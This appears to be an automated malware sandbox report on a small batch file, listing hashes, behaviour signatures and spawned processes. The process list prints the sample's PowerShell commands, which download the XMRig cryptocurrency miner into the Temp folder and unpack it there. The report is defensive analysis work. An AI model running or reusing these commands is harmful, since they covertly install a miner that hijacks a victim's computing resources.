Analysis
-
max time kernel
839s -
max time network
839s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
21-12-2024 15:10
Behavioral task
behavioral1
Sample
s.bat
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
s.bat
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
s.bat
Resource
win10ltsc2021-20241211-en
General
-
Target
s.bat
-
Size
1KB
-
MD5
f9e0161fac70cf9d9935e2f8d1f1891e
-
SHA1
a6a1efcdb0c9dc7dee578400e7b3e7fc7eda50cc
-
SHA256
1572be5be48b2559b80405a61761e6377ceb81c4b67ffeeeaa9a9819b9e5716a
-
SHA512
e5a2fad1a1b002620dc9d85bf6c041527cb614d9bacaa010f152d3bf39ca8838c55aec18534c19283f751645879b9c1cb7fe7567820093d7ada609a06d893bcf
Malware Config
Signatures
-
pid Process 1892 powershell.exe 2292 powershell.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1892 powershell.exe 2292 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 1892 powershell.exe Token: SeDebugPrivilege 2292 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 2336 wrote to memory of 1892 2336 cmd.exe 31 PID 2336 wrote to memory of 1892 2336 cmd.exe 31 PID 2336 wrote to memory of 1892 2336 cmd.exe 31 PID 2336 wrote to memory of 2292 2336 cmd.exe 32 PID 2336 wrote to memory of 2292 2336 cmd.exe 32 PID 2336 wrote to memory of 2292 2336 cmd.exe 32
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\s.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2336 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri https://github.com/xmrig/xmrig/releases/download/v6.22.2/xmrig-6.22.2-msvc-win64.zip -OutFile C:\Users\Admin\AppData\Local\Temp\xmrig-6.22.2-msvc-win64.zip"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1892
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Expand-Archive -Path C:\Users\Admin\AppData\Local\Temp\xmrig-6.22.2-msvc-win64.zip -DestinationPath C:\Users\Admin\AppData\Local\Temp\xmrig"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2292
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD531316b1774b759a7c323a26768f40f04
SHA196d86ea5da1f7199d8a3e6422da8e41b413cbf63
SHA256c35b5b2790dd4f251a1cc09dc96fa7ed5a5efe97854042f4c1137001f8aced69
SHA512b11ea38686e0559bebbcf0d9d65256e2807ddaa26af0e13242fa610fcd5c17b4079e14829cab556b3a9f9dd916bcd597d5f9afeee8bde137648dbc2ebc7c51ae